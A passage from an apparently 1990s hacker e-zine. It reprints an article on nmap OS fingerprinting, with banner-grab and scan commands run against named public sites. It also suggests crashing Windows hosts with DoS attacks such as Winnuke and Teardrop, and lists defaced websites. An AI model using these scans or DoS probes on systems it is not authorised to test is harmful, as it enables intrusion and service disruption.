of banners and many admins do not turn them off. Just because there
are other ways to figure out what OS is running (such as
fingerprinting), does not mean we should just announce our OS and
architecture to every schmuck who tries to connect.

The problems with relying on this technique are that an increasing
number of people are turning banners off, many systems don't give much
information, and it is trivial for someone to "lie" in their banners.
Nevertheless, banner reading is all you get for OS and OS Version
checking if you spend $thousands on the commercial ISS scanner.
Download nmap or queso instead and save your money :).

Even if you turn off the banners, many applications will happily give
away this kind of information when asked. For example lets look at an
FTP server:

payfonez> telnet ftp.netscape.com 21
Trying 207.200.74.26 ...
Connected to ftp.netscape.com.
Escape character is '^]'.
220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready.
SYST
215 UNIX Type: L8 Version: SUNOS

First of all, it gives us system details in its default banner. Then
if we give the 'SYST' command it happily feeds back even more information.

If anon FTP is supported, we can often download /bin/ls or other
binaries and determine what architecture it was built for.

Many other applications are too free with information. Take web
servers for example:

playground> echo 'GET / HTTP/1.0\n' | nc hotbot.com 80 | egrep '^Server:'
Server: Microsoft-IIS/4.0
playground>

Hmmm ... I wonder what OS those lamers are running.

Other classic techniques include DNS host info records (rarely
effective) and social engineering. If the machine is listening on
161/udp (snmp), you are almost guaranteed a bunch of detailed info
using 'snmpwalk' from the CMU SNMP tools distribution and the 'public'
community name.


CURRENT FINGERPRINTING PROGRAMS


Nmap is not the first OS recognition program to use TCP/IP
fingerprinting. The common IRC spoofer sirc by Johan has included
very rudimentary fingerprinting techniques since version 3 (or
earlier). It attempts to place a host in the classes "Linux",
"4.4BSD", "Win95", or "Unknown" using a few simple TCP flag tests.

Another such program is checkos, released publicly in January of this
year by Shok in Confidence Remains High Issue #7.
The fingerprinting techniques are exactly the same as SIRC, and even
the code is identical in many places. Checkos was privately
available for a long time prior to the public release, so I have no
idea who swiped code from whom. But neither seems to credit the
other. One thing checkos does add is telnet banner checking, which is
useful but has the problems described earlier. [ Update: Shok wrote in
to say that chekos was never intended to be public and this is why he
didn't bother to credit SIRC for some of the code. ]

Su1d also wrote an OS checking program. His is called SS and as of
Version 3.11 it can identify 12 different OS types. I am somewhat
partial to this one since he credits my nmap program for some of the
networking code :).

Then there is queso. This program is the newest and it is a huge leap
forward from the other programs. Not only do they introduce a couple
new tests, but they were the first (that I have seen) to move the
OS fingerprints out of the code. The other scanners included code like:

/* from ss */
if ((flagsfour & TH_RST) && (flagsfour & TH_ACK) && (winfour == 0) &&
(flagsthree & TH_ACK))
reportos(argv[2],argv[3],"Livingston Portmaster ComOS");

Instead, queso moves this into a configuration file which obviously
scales much better and makes adding an OS as easy as appending a few
lines to a fingerprint file.

Queso was written by Savage, one of the fine folks at Apostols.org .

One problem with all the programs describe above is that they are very
limited in the number of fingerprinting tests which limits the
granularity of answers. I want to know more than just 'this machine
is OpenBSD, FreeBSD, or NetBSD', I wish to know exactly which of those
it is as well as some idea of the release version number. In the same
way, I would rather see 'Solaris 2.6' than simply 'Solaris'. To
achieve this response granularity, I worked on a number of
fingerprinting techniques which are described in the next section.

FINGERP

  
RINTING METHODOLOGY

There are many, many techniques which can be used to fingerprint
networking stacks. Basically, you just look for things that differ
among operating systems and write a probe for the difference. If you
combine enough of these, you can narrow down the OS very tightly. For
example nmap can reliably distinguish Solaris 2.4 vs. Solaris 2.5-2.51
vs Solaris 2.6. It can also tell Linux kernel 2.0.30 from 2.0.31-34
or 2.0.35. Here are some techniques:

The FIN probe -- Here we send a FIN packet (or any packet without an
ACK or SYN flag) to an open port and wait for a response. The
correct RFC
793 behavior is to NOT respond, but many broken
implementations such as MS Windows, BSDI, CISCO, HP/UX, MVS, and
IRIX send a RESET back. Most current tools utilize this
technique.

The BOGUS flag probe -- Queso is the first scanner I have seen to use
this clever test. The idea is to set an undefined TCP "flag" ( 64
or 128) in the TCP header of a SYN packet. Linux boxes prior to
2.0.35 keep the flag set in their response. I have not found any
other OS to have this bug. However, some operating systems seem
to reset the connection when they get a SYN+BOGUS packet. This
behavior could be useful in identifying them.

TCP ISN Sampling -- The idea here is to find patterns in the initial
sequence numbers chosen by TCP implementations when responding to
a connection request. These can be categorized in to many groups
such as the traditional 64K (many old UNIX boxes), Random
increments (newer versions of Solaris, IRIX, FreeBSD, Digital
UNIX, Cray, and many others), True "random" (Linux 2.0.*, OpenVMS,
newer AIX, etc). Windows boxes (and a few others) use a "time
dependent"
model where the ISN is incremented by a small fixed
amount each time period. Needless to say, this is almost as
easily defeated as the old 64K behavior. Of course my favorite
technique is "constant". The machines ALWAYS use the exact same
ISN :). I've seen this on some 3Com hubs (uses 0x803) and Apple
LaserWriter printers (uses 0xC7001).

You can also subclass groups such as random incremental by
computing variances, greatest common divisors, and other functions
on the set of sequence numbers and the differences between the
numbers.

It should be noted that ISN generation has important security
implications. For more information on this, contact "security
expert"
Tsutomu "Shimmy" Shimomura at SDSC and ask him how he was
owned. Nmap is the first program I have seen to use this for OS
identification.

Don't Fragment bit -- Many operating systems are starting to set the
IP "Don't Fragment" bit on some of the packets they send. This
gives various performance benefits (though it can also be annoying
-- this is why nmap fragmentation scans do not work from Solaris
boxes). In any case, not all OS's do this and some do it in
different cases, so by paying attention to this bit we can glean
even more information about the target OS. I haven't seen this
one before either.

TCP Initial Window -- This simply involves checking the window size on
returned packets. Older scanners simply used a non-zero window on
a RST packet to mean "BSD 4.4 derived". Newer scanners such as
queso and nmap keep track of the exact window since it is actually
pretty constant by OS type. This test actually gives us a lot of
information, since some operating systems can be uniquely
identified by the window alone (for example, AIX is the only OS I
have seen which uses 0x3F25). In their "completely rewritten"
TCP stack for NT5, Microsoft uses 0x402E. Interestingly, that is
exactly the number used by OpenBSD and FreeBSD.

ACK Value -- Although you would think this would be completely
standard, implementations differ in what value they use for the
ACK field in some cases. For example, lets say you send a
FIN|PSH|URG to a closed TCP port. Most implementations will set
the ACK to be the same as your initial sequence number, though
Windows and some stupid printers will send your seq + 1. If you
send a SYN|FIN|URG|PSH to an open port, Windows is very
inconsistent. Sometimes it sends back your seq, other times it
sends S++, and still other times is sends back a seemingly random
value. One has to wonder what kind of code MS is writing that
changes its mind like this.

ICMP Error Message Quenching -- Some (smart) operating systems follow
the RFC 1812 suggestion to limit the rate at which various error
messages are sent. For example, the Linux kernel (in
net/ipv4/icmp.h) limits destination unreachable message generation
to 80 per 4 seconds, with a 1/4 second penalty if that is
exceeded. One way to test this is to send a bunch of packets to
some random high UDP port and count the number of unreachables
received. I have not seen this used before, and in fact I have
not added this to nmap (except for use in UDP port scanning).
This test would make the OS detection take a bit longer since you
need to send a bunch of packets and wait for them to return. Also
dealing with the possibility of packets dropped on the network
would be a pain.

ICMP Message Quoting -- The RFCs specify that ICMP error messages
quote some small amount of an ICMP message that causes various
errors. For a port unreachable message, almost all
implementations send only the required IP header + 8 bytes back.
However, Solaris sends back a bit more and Linux sends back even
more than that. The beauty with this is it allows nmap to
recognize Linux and Solaris hosts even if they don't have any
ports listening.

ICMP Error message echoing integrity -- I got this idea from something
Theo De Raadt (lead OpenBSD developer) posted to
comp.security.unix. As mentioned before, machines have to send
back part of your original message along with a port unreachable
error. Yet some machines tend to use your headers as 'scratch
space' during initial processing and so they are a bit warped by
the time you get them back. For example, AIX and BSDI send back an
IP 'total length' field that is 20 bytes too high. Some BSDI,
FreeBSD, OpenBSD, ULTRIX, and VAXen fuck up the IP ID that you sent
them. While the checksum is going to change due to the changed
TTL anyway, there are some machines (AIX, FreeBSD, etc.) which send
back an inconsistent or 0 checksum. Same thing goes with the UDP
checksum. All in all, nmap does nine different tests on the ICMP
errors to sniff out subtle differences like these.

Type of Service -- For the ICMP port unreachable messages I look at
the type of service (TOS) value of the packet sent back. Almost
all implementations use 0 for this ICMP error although Linux uses
0xC0. This does not indicate one of the standard TOS values, but instead is
part of the unused (AFAIK) precedence field. I do not know why
this is set, but if they change to 0 we will be able to keep
identifying the old versions and we will be able to identify
between old and new.

Fragmentation Handling -- This is a favorite technique of Thomas
H. Ptacek of Secure Networks, Inc (now owned by a bunch of Windows
users at NAI). This takes advantage of the fact that different
implementations often handle overlapping IP fragments differently.
Some will overwrite the old portions with the new, and in other
cases the old stuff has precedence. There are many different
probes you can use to determine how the packet was reassembled. I
did not add this capability since I know of no portable way to send
IP fragments (in particular, it is a bitch on Solaris). For more
information on overlapping fragments, you can read their IDS paper
(www.secnet.com).

TCP Options -- These are truly a gold mine in terms of leaking
information. The beauty of these options is that:
1) They are generally optional (duh!) :) so not all hosts implement
them.
2) You know if a host implements them by sending a query with an
option set. The target generally show support of the option by
setting it on the reply.
3) You can stuff a whole bunch of options on one packet to test
everything at once.

Nmap sends these options along with almost every probe packet:

Window Scale=10; NOP; Max Segment Size = 265; Timestamp; End of Ops;

When you get your response, you take a look at which options were
returned and thus are supported. Some operating systems such as
recent FreeBSD boxes support all of the above, while others, such
as Linux 2.0.X support very few. The latest Linux 2.1.x kernels
do support all of the above. On the other hand, they are more
vulnerable to TCP sequence prediction. Go figure.

Even if several operating systems support the same set of options,
you can sometimes distinguish them by the values of the options.
For example, if you send a small MSS value to a Linux box, it will
generally echo that MSS back to you. Other hosts will give you
different values.

And even if you get the same set of supported options AND the same
values, you can still differentiate via the order that the
options are given, and where padding is applied. For example
Solaris returns 'NNTNWME' which means:
<no op><no op><timestamp><no op><window scale><echoed MSS>

While Linux 2.1.122 returns MENNTNW. Same options, same values,
but different order!

I have not seen any other OS detection tools utilizes TCP options,
but it is very useful.

There are a few other useful options I might probe for at some
point, such as those that support T/TCP and selective
acknowledgements.


Exploit Chronology -- Even with all the tests above, nmap is unable to
distinguish between the TCP stacks of Win95, WinNT, or Win98.
This is rather surprising, especially since Win98 came out about 4
years after Win95. You would think they would have bothered to
improve the stack in some way (like supporting more TCP options)
and so we would be able to detect the change and distinguish the
operating systems. Unfortunately, this is not the case. The NT
stack is apparently the same crappy stack they put into '95. And
they didn't bother to upgrade it for '98.

But do not give up hope, for there is a solution. You can simply
start with early Windows DOS attacks (Ping of Death, Winnuke, etc)
and move up a little further to attacks such as Teardrop and Land.
After each attack, ping them to see whether they have crashed.
When you finally crash them, you will likely have narrowed what
they are running down to one service pack or hotfix.

I have not added this functionality to nmap, although I must admit
it is very tempting :).


SYN Flood Resistance -- Some operating systems will stop accepting new
connections if you send too many forged SYN packets at them
(forging the packets avoids trouble with your kernel resetting the
connections). Many operating systems can only handle 8 packets.
Recent Linux kernels (among other operating systems) allow
various methods such as SYN cookies to prevent this from being a
serious problem. Thus you can learn something about your target
OS by sending 8 packets from a forged source to an open port and
then testing whether you can establish a connection to that port
yourself. This was not implemented in nmap since some people get
upset when you SYN flood them. Even explaining that you were
simply trying to determine what OS they are running might not help
calm them.

NMAP IMPLEMENTATION AND RESULTS

I have created a reference implementation of the OS detection
techniques mentioned above (except those I said were excluded). I
have added this to my Nmap scanner which has the advantage that it
already knows what ports are open and closed for fingerprinting so
you do not have to tell it. It is also portable among Linux, *BSD,
and Solaris 2.51 and 2.6, and some other operating systems.

The new version of nmap reads a file filled with Fingerprint templates
that follow a simple grammar. Here is an example:

FingerPrint IRIX 6.2 - 6.4 # Thanks to Lamont Granquist
TSeq(Class=i800)
T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=C000|EF2A%ACK=O%Flags=A%Ops=NNT)
T4(DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

Lets look at the first line (I'm adding '>' quote markers):

> FingerPrint IRIX 6.2 - 6.3 # Thanks to Lamont Granquist

This simply says that the fingerprint covers IRIX versions 6.2 through
6.3 and the comment states that Lamont Granquist kindly sent me the IP
addresses or fingerprints of the IRIX boxes tested.

> TSeq(Class=i800)

This means that ISN sampling put it in the "i800 class". This means
that each new sequence number is a multiple of 800 greater than the
last one.

> T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT)

The test is named T1 (for test1, clever eh?). In this test we send a
SYN packet with a bunch of TCP options to an open port. DF=N means
that the "Don't fragment" bit of the response must not be set.
W=C000|EF2A means that the window advertisement we received must
be 0xC000 or EF2A. ACK=S++ means the acknowledgement we receive must
be our initial sequence number plus 1. Flags = AS means the ACK and
SYN flags were sent in the response. Ops = MNWNNT means the options
in the response must be (in this order):

<MSS (not echoed)><NOP><Window scale><NOP><NOP><Timestamp>

> T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)

Test 2 involves a NULL with the same options to an open port. Resp=Y
means we must get a response. Ops= means that there must not be any
options included in the response packet. If we took out '%Ops='
entirely then any options sent would match.

> T3(Resp=Y%DF=N%W=400%ACK=S++%Flags=AS%Ops=M)

Test 3 is a SYN|FIN|URG|PSH w/options to an open port.

> T4(DF=N%W=0%ACK=O%Flags=R%Ops=)

This is an ACK to an open port. Note that we do not have a Resp=
here. This means that lack of a response (such as the packet being
dropped on the network or an evil firewall) will not disqualify a
match as long as all the other tests match. We do this because
virtually any OS will send a response, so a lack of response is
generally an attribute of the network conditions and not the OS
itself. We put the Resp tag in tests 2 and 3 because some operating
systems do drop those without responding.

> T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
> T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
> T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)

These tests are a SYN, ACK, and FIN|PSH|URG, respectively, to a closed
port. The same options as always are set. Of course this is all
probably obvious given the descriptive names 'T5', 'T6', and 'T7' :).

> PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

This big sucker is the 'port unreachable' message test. You should
recognize the DF=N by now. TOS=0 means that IP type of service field
was 0. The next two fields give the (hex) values of the IP total
length field of the message IP header and the total length given in
the IP header they are echoing back to us. RID=E means the RID value
we got back in the copy of our original UDP packet was expected (ie
the same as we sent). RIPCK=E means they didn't fuck up the checksum
(if they did, it would say RIPCK=F). UCK=E means the UDP checksum is
also correct. Next comes the UDP length which was 0x134 and DAT=E
means they echoed our UDP data correctly. Since most implementations
(including this one) do not send any of our UDP data back, they get
DAT=E by default.

The version of nmap with this functionality is currently in the 6th
private beta cycle. It may be out by the time you read this in
Phrack. Then again, it might not. See http://www.insecure.org/nmap/
for the latest version.

POPULAR SITE SNAPSHOTS

Here is the fun result of all our effort. We can now take random
Internet sites and determine what OS they are using. A lot of these
people have eliminated telnet banners, etc. to keep this information
private. But this is of no use with our new fingerprinter! Also
this is a good way to expose the <your favorite crap OS> users as the
lamers that they are :)!

The command used in these examples was: nmap -sS -p 80 -O -v <host>

Also note that most of these scans were done on 10/18/98. Some of
these folks may have upgraded/changed servers since then.

Note that I do not like every site on here.

# "Hacker" sites or (in a couple cases) sites that think they are
www.l0pht.com => OpenBSD 2.2 - 2.4
www.insecure.org => Linux 2.0.31-34
www.rhino9.ml.org => Windows 95/NT # No comment :)
www.technotronic.com => Linux 2.0.31-34
www.nmrc.org => FreeBSD 2.2.6 - 3.0
www.cultdeadcow.com => OpenBSD 2.2 - 2.4
www.kevinmitnick.com => Linux 2.0.31-34 # Free Kevin!
www.2600.com => FreeBSD 2.2.6 - 3.0 Beta
www.antionline.com => FreeBSD 2.2.6 - 3.0 Beta
www.rootshell.com => Linux 2.0.35 # Changed to OpenBSD after
# they got owned.

# Security vendors, consultants, etc.
www.repsec.com => Linux 2.0.35
www.iss.net => Linux 2.0.31-34
www.checkpoint.com => Solaris 2.5 - 2.51
www.infowar.com => Win95/NT

# Vendor loyalty to their OS
www.li.org => Linux 2.0.35 # Linux International
www.redhat.com => Linux 2.0.31-34 # I wonder what distribution :)
www.debian.org => Linux 2.0.35
www.linux.org => Linux 2.1.122 - 2.1.126
www.sgi.com => IRIX 6.2 - 6.4
www.netbsd.org => NetBSD 1.3X
www.openbsd.org => Solaris 2.6 # Ahem :)
www.freebsd.org => FreeBSD 2.2.6-3.0 Beta

# Ivy league
www.harvard.edu => Solaris 2.6
www.yale.edu => Solaris 2.5 - 2.51
www.caltech.edu => SunOS 4.1.2-4.1.4 # Hello! This is the 90's :)
www.stanford.edu => Solaris 2.6
www.mit.edu => Solaris 2.5 - 2.51 # Coincidence that so many good
# schools seem to like Sun?
# Perhaps it is the 40%
# .edu discount :)
www.berkeley.edu => UNIX OSF1 V 4.0,4.0B,4.0D
www.oxford.edu => Linux 2.0.33-34 # Rock on!

# Lamer sites
www.aol.com => IRIX 6.2 - 6.4 # No wonder they are so insecure :)
www.happyhacker.org => OpenBSD 2.2-2.4 # Sick of being owned, Carolyn?
# Even the most secure OS is
# useless in the hands of an
# incompetent admin.

# Misc
www.lwn.net => Linux 2.0.31-34 # This Linux news site rocks!
www.slashdot.org => Linux 2.1.122 - 2.1.126
www.whitehouse.gov => IRIX 5.3
sunsite.unc.edu => Solaris 2.6

Notes: In their security white paper, Microsoft said about their lax
security: "this assumption has changed over the years as Windows NT
gains popularity largely because of its security features."
. Hmm,
from where I stand it doesn't look like Windows is very popular among
the security community :). I only see 2 Windows boxes from the whole
group, and Windows is easy for nmap to distinguish since it is so
broken (standards wise).

And of course, there is one more site we must check. This is the web
site of the ultra-secret Transmeta corporation. Interestingly the
company was funded largely by Paul Allen of Microsoft, but it employs
Linus Torvalds. So do they stick with Paul and run NT or do they side
with the rebels and join the Linux revolution? Let us see:

We use the command:
nmap -sS -F -o transmeta.log -v -O www.transmeta.com//24

This says SYN scan for known ports (from /etc/services), log the
results to 'transmeta.log', be verbose about it, do an OS scan, and
scan the class 'C' where www.transmeta.com resides. Here is the gist
of the results:

neon-best.transmeta.com (206.184.214.10) => Linux 2.0.33-34
www.transmeta.com (206.184.214.11) => Linux 2.0.30
neosilicon.transmeta.com (206.184.214.14) => Linux 2.0.33-34
ssl.transmeta.com (206.184.214.15) => Linux unknown version
linux.kernel.org (206.184.214.34) => Linux 2.0.35
www.linuxbase.org (206.184.214.35) => Linux 2.0.35 ( possibly the same
machine as above )

Well, I think this answers our question pretty clearly :).


ACKNOWLEDGEMENTS

The only reason Nmap is currently able to detect so many different
operating systems is that many people on the private beta team went to
a lot of effort to search out new and exciting boxes to fingerprint!
In particular, Jan Koum, van Hauser, Dmess0r, David O'Brien, James
W. Abendschan, Solar Designer, Chris Wilson, Stuart Stock, Mea Culpa,
Lamont Granquist, Dr. Who, Jordan Ritter, Brett Eldridge, and Pluvius
sent in tons of IP addresses of wacky boxes and/or fingerprints of
machines not reachable through the Internet.

Thanks to Richard Stallman for writing GNU Emacs. This article would
not be so well word-wrapped if I was using vi or cat and ^D.

Questions and comments can be sent to fyodor@DHP.com (if that doesn't
work for some reason, use fyodor@insecure.org). Nmap can be obtained
from http://www.insecure.org/nmap .

@HWA





!=----------=- -=----------=- -=----------=- -=----------=- -=----------=-




O
0
o
O O O
0

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

END of main news articles content... read om for ads, humour, hacked websites etc

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-




HWA.hax0r.news





AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************


www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>


+-----------------------------------------------------------------------------+
| SmoGserz's site ... http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="
http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *



* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *




* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA




HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*

Send in submissions for this section please! .............


An oldie but goodie and translated from that gawdawful 'krad speak' for those of you
that have been living under a rock for the last 10 years the original file follows
this spoof. - Ed


This was edited from krad-speak to ascii.. if you want to see it in it's original glory, see BoW 4

______________________________________________________________________________

555555555555555555555555555555555555555555555555555555555555555555555555555555
______________________________________________________________________________
BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo
W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW
BoW BoW BoW BoW BoW Bo| Th3 K0nsc|3nc3 0f a K0ur|3r |BoW BoW BoW BoW BoW Bo
W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW
BoW BoW BoW BoW BoW Bo* by: Th3 K0d3s1ay3r *BoW BoW BoW BoW BoW Bo
==============================================================================
The following wuz written shortly after my arrest...

Written on March 20, 1994
------------------------------------------------------------------------------

Another one kaught today, itz all over the paperz. "
Teenager
arrested in software piracy skandal", "kourier arrested after distributing
warez"...
Damn Kidz. They're all alike.

But did u, in u're 3-piece psychology and 1950's technobrain, ever take
a look behind the eyez of a kourier? Did u ever wonder what made him tick,
what forcez shaped him, what may have molded him?
I am a kourier, enter my world...
Mine iz a world that beginz with skool... I'm not the smartezt kid in
the class, I don't quite get this education thing...
Damn underachiever. They're all alike.

I'm in cosmetology skool or kommunity college. I've listened to
teacherz explain for the fifteenth time how to reduce a fraction, and I still
don't understand it. "
No Ms. Smith, I didn't show my work. I don't get how
u type with these pencil things. Give me a joystick or something."
Damn kid. Must be a druggie. They're all alike.

I make a discovery today. I found a computer. Wait a second, this is
cool. I can play commander keen all i want. If i loose a game, it's because
i didn't get the 0-day eleet game c0dez. Not because it doesn't like me...
Or feelz i'm a worthless inbred skumbag...
Or thinkz i'm an idiot...
Or doesn't like teaching and is threatened by my good looks...
Damn kid. All he duz is play doom. They're all alike.

And then it happened... a door opened to a new world... rushing thru
the fone line like heroin thru an addict's veinz, the latest version of DOS is
sent out at a bazillion baud, a refuge from intelligence is sought... a 0-day
warez board is found!
"
This is it... this is where i belong!"
I know everyone here... even if i've never met them, never talked to
them, never traded apogee with them, may never hear from them again... i know
u all...
Damn kid. Tying up the fone line again. They're all alike...

U bet u're ass we're all alike... we've been spoon-fed baby food at
skool when we hungered for ANSI and codez... the bitz of meat u did let slip
thru were a little on the well done side and i had a little trouble digesting
them. We've been dominated by intellectualz, or ignored by dum skolar dudez.
The few that had something to teach talked in some fancee shmancee english
language or something, and i wouldn't know what they were talking about anyway.

This is our world now... the world of the kode and the console copier,
the beauty of the file point. We make use of some telefone thing or something
for free with codez so we don't have to pay to trade -15 day gamez and the
latest ANSI releases, and u kall us kriminals. We trace credit cards... and
U call us kriminals. We distribute copyrighted software... and u call us
criminals. We steal games from radio shack... and u call us criminals. We
exist without skin color, (cuz we're always inside downloading and uploading)
without religious bias, (cuz we have know idea that the hell religios bias is)
without intelligence... and u kall us criminals. U start wars and stuff, yet
we're the kriminals.

Yes, I am a criminal. My crime is that of stupidity. My crime is that
of judging people by how much they upload and how k-rad they're typing is, not
what they look like or if they can spell they're name right the first time
without messing up. My crime is that of stealing u're work and putting my name
On it, and u get all huffy puffy about it.

I am a kourier, and this is my manifesto. U may stop one moron, but
U can't stop us all! After all, we're all alike.

+++The Kodeslayer+++

=----------------------------------------------------------------------------------------=

The Hacker Manifesto aka 'The Mentor's Last Words'

==Phrack Inc.==

Volume One, Issue 7, Phile 3 of 10


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The following was written shortly after my arrest...

\/\The Conscience of a Hacker/\/

by

+++The Mentor+++

Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Another one got caught today, it's all over the papers. "
Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker? Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain
for the fifteenth time how to reduce a fraction. I understand it. "
No, Ms.
Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
"
This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless. We've been dominated by sadists, or
ignored by the apathetic. The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals. We explore... and you call us criminals. We seek
after knowledge... and you call us criminals. We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.

+++The Mentor+++
_______________________________________________________________________________









-=-

@HWA



SITE.1 http://www.insecure.org/

SiteOp: Fyodor

Real hacker's site by a real hacker, lots of good resources and reading materials
fyodor is the author of the infamous nmap program and used to run Fyodor's Exploit
World which inspired the likes of Rootshell.... give it a look see if you haven't
already
- eentity





@HWA



H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)


Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...



From HNN rumours section http://www.hackernews.com/
see the archives section on HNN or attrition.org for copies of many of these
sites in their defaced form.

http://www.attrition.org/

Latest cracked pages courtesy of attrition.org

(www.reverse.net) .......................... Reverse Net
(www.isop.org) ........................... Internet Society of Pakistan
(matahum.bacolod.worldtelphil.com) .......... World Telphil
(www.aspx.com) ............................. ASPX
(www.greatbasinphoto.com)................... Great Basin Photo
(www.guesslimousines.com)................... Guess Limousines
(www.hotelrivieramaya.com).................. Hotel Riviera Maya
(www.icaroweb.com) ......................... Icaro Web
(www.motoairbag.com)........................ Moto Airbag
(www.webnautics.com) ....................... Webnautics
(www.vanasia.it)............................ Vanasia
(summa.infosquare.it)....................... Infosquare (IT)
(www.infosatpoint.it)....................... Infosat Point (IT)
(www.medicinasportiva.it)................... Medicina Sportiva (IT)
(www.targetgroup.it)........................ Target Group (IT)
(www.presidencia.gov.py).................... Presidencia (PY)



and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________



A.1 PHACVW, sekurity, security, cyberwar links
